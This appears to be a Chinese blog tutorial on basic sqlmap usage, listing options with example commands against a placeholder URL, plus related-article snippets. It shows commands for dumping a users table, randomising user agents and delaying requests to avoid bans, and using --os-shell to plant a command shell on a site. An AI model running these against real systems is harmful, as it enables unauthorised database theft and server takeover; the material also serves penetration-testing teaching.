sqlmap的基本使用

最新推荐文章于 2024-05-06 17:15:42 发布
最新推荐文章于 2024-05-06 17:15:42 发布
阅读量71 收藏
点赞数
分类专栏: 网络安全 文章标签: 数据库 postgresql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vivlol918/article/details/130976492
版权
sqlmap的基本使用

Sqlmap是一款开源的渗透测试工具,用于自动化检测和利用SQL注入漏洞。它支持各种数据库(如MySQL,Oracle,MS SQL Server,PostgreSQL等),可以检测和利用注入漏洞,以获取数据库中的数据,包括用户凭据、敏感数据和后端应用程序的源代码。Sqlmap可以通过一系列设置和参数进行自动化测试和攻击,同时它也提供了交互式的控制台界面,供用户手动操作。Sqlmap的功能强大,是渗透测试人员必备的工具之一

  1. -u:指定目标URL进行注入测试

    例如:sqlmap -u http://www.example.com/index.php?id=1

  2. –dbs:列出目标url的数据库名

    例如:sqlmap -u http://www.example.com/index.php?id=1 --dbs

  3. -D:指定数据库名

    例如:sqlmap -u http://www.example.com/index.php?id=1 -D test -- tables

  4. –tables:列出数据库中的所有表

    例如:sqlmap -u http://www.example.com/index.php?id=1 --tables

  5. –columns:列出指定表中的所有列

    例如:sqlmap -u http://www.example.com/index.php?id=1 --columns -T users

  6. –dump:将指定表中的所有数据导出为文本

    例如:sqlmap -u http://www.example.com/index.php?id=1 --dump -T users

  7. –level:指定注入测试时的等级,支持从1到5级

    例如:sqlmap -u http://www.example.com/index.php?id=1 --level=3

  8. –risk:指定注入测试时的风险等级,支持从1到3级

    例如:sqlmap -u http://www.example.com/index.php?id=1 --risk=2

  9. -b:指定目标应用程序的后端数据库管理系统的版本

    例如:sqlmap -u http://www.example.com/index.php?id=1 -b

  10. –os:指定目标操作系统类型

    例如:sqlmap -u http://www.example.com/index.php?id=1 --os=Windows

  11. –time-sec:设置测试时请求的超时时间

    例如:sqlmap -u http://www.example.com/index.php?id=1 --time-sec=10

  12. -v:开启详细模式,输出更为详细的测试信息

    例如:sqlmap -u http://www.example.com/index.php?id=1 -v

常见指令:

–random-agent 选择随机user-agents头

–delay=1 每次探测延时1秒(防止访问过快被ban)

–count 查看数据量

–is-dba 查询当前用户权限,如果dba是True可以尝试直接拿webshell

–os-shell 尝试往网站中放入一个cmdshell(就是拥有cmd权限的shell),先选择写入shell的脚步语言,有的需要填写网站的web目录的绝对路径,有的可以直接选择好shell的脚本语言类型就可以直接拿shell

–flush-session 删除缓存

自饰者六便士
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLmap使用手册1
08-03
SQLmap 所支持的数据库系统基本涵盖了我们常用的一些关系类的数据库诸如:MySQL、Oracle、PostgreSQL、MSSQL、Microsoft、IB
使用sqlmap进行SQL注入攻击
不忘初心,护天下安全!
11-23 8918
SQL注入攻击的特点 ① Web应用程序没有对用户输入进行合法性验证而产生SQL注入漏洞( “空格”的存在和使用); ② 攻击者通过构造特殊的SQL语句,将指令插入系统原始的SQL查询语句中并执行它; ③ 获取数据库的敏感信息,甚至获取主机的控制权。     SQL注入攻击具有广泛性。 原理 SQL注入的原理 ① 地址http://127.0.0.1/inject.asp?dbtype=sq...
网络安全渗透之sqlmap
我这不是依托答辩随你怎么说
05-21 107
例如–dbs不能写成–DBS。【1】指令选项大小写问题。
SQLMAP注入教程-几种常见SQLMAP使用方法详解
qq_38689342的博客
09-17 1728
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一、SQLMAP用于Access数据库注入 (1) 猜解是否能注入 1.win: python sqlmap.py -u "http://www....
SQL注入工具sqlmap的注入过程记录
weixin_30791095的博客
12-23 644
1.sqlmap的get注入 假设目标是 https://www.baidu.com/news.php?id=1&data=2 sqlmap语句 列库 sqlmap.py -u "https://www.baidu.com/news.php?id=1&data=2" --dbs //假设结果显示库有3个: test1 、test2、test3 获取库test1...
DDOS和sql注入网络攻防实验
weixin_34221332的博客
11-15 1708
模拟网络攻防实验 好久没研究渗透攻击了,巩固一下 sql注入攻击 概述 通过对SQL注入的演示,让大家了解SQL注入漏洞的方式,并学习应对此种漏洞的防御方法。 环境拓扑图 Ip地址 操作机IP地址:172.16.11.2 整体说明 1、第一步,判断注入点字符还是数字 字符型 ' and 'a'=a' ' and 'a'='b 数字型 and 1=1 a...
sqlmap使用文档
11-11
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, ...
SQLmap常用命令
05-08
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,当然对于真实环境中这爆破功能战斗力基本为0....
sqlmap-master.zip
05-07
Burp Suite 之Sqlmap插件,SQL注入是远比命令行注入、Xpath注入、Ldap注入更常见。这就是本章要讲述的主要内容:在web应用程序的渗透测试中,如何使用...在讲述本章内容之前,默认为读者熟悉SQL的原理和SqlMap基本使用
sqlmap常用语句
08-14
sqlmap常用语句sqlmap常用语句
SQLMAP攻击流量特征分析
asaotomo的博客
12-02 9816
本文通过抓包分析sqlmap的攻击流量,对其攻击流程和特征进行提取和归纳总结。
sqlmap简单入门攻略
MSLD_PPT的博客
10-17 1034
sqlmap依托于python,首先下载python 和 sqlmap 下载地址 python 安装一步步默认即可,安装完后将sqlmap 放入python根目录下 这还没结束,然后桌面新建快捷方式 然后找到新建的快捷方式,右键属性修改起始位置为你的sqlmap的地址 之后就可已正常使用sqlmapSQLMAP用于mysqlDDOS攻击 1.sqlmap.py -u [url]htt...
SQLMAP渗透笔记之Mysql Dos攻击
Birdman-one的博客
12-26 1009
---------------------------------------------------------------------------------------------                 SQLMAP渗透笔记之Mysql Dos攻击 ---------------------------------------------------------
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 3961
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
【课堂练习】
JacksonLeo的博客
04-29 510
虽然现代JVM的垃圾回收机制已经非常高效,但是在性能敏感的场合,仍然需要注意对象的创建频率。例如,在SysLogininforMapper中的deleteLogininforByIds方法,如果处理大量ID时,应考虑使用批处理技术,而不是循环单条处理。例如,在SysMenuMapper中的查询方法,如果涉及到复杂的查询条件或者大量数据的查询,应确保SQL语句的优化和索引的使用。异常处理:代码中应该有更明确的异常处理逻辑,比如使用try-catch块捕获可能的异常,并进行适当的处理,如记录日志、回滚事务等。
MySQL数据库练习(6)
a1677179的博客
04-29 295
MySQL数据库练习(6)
java线上问题排查之磁盘和网络查看分析(二)
wayne_youlu的博客
04-30 481
overflowed 标识全连接队列溢出的次数,最前面是0,标识没有队列溢出的情况,网络环境正常。来查看网络是否连接。如果出现下图内容,则证明网络已经连接。
【Redis】RDB持久化和AOF 持久化
最新发布
wmh的博客
05-06 403
RDB (Redis Database Backup file):数据快照默认保存在运行目录# 主进程保存快照(阻塞) save # 子进程保存快照 bgsaveRedis 停机时会执行一次RDB。AOF (Append Only File):命令日志。
sqlmap基本使用方法
08-24
- *2* *3* [sqlmap基本使用方法](https://blog.csdn.net/jayjaydream/article/details/108555660)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值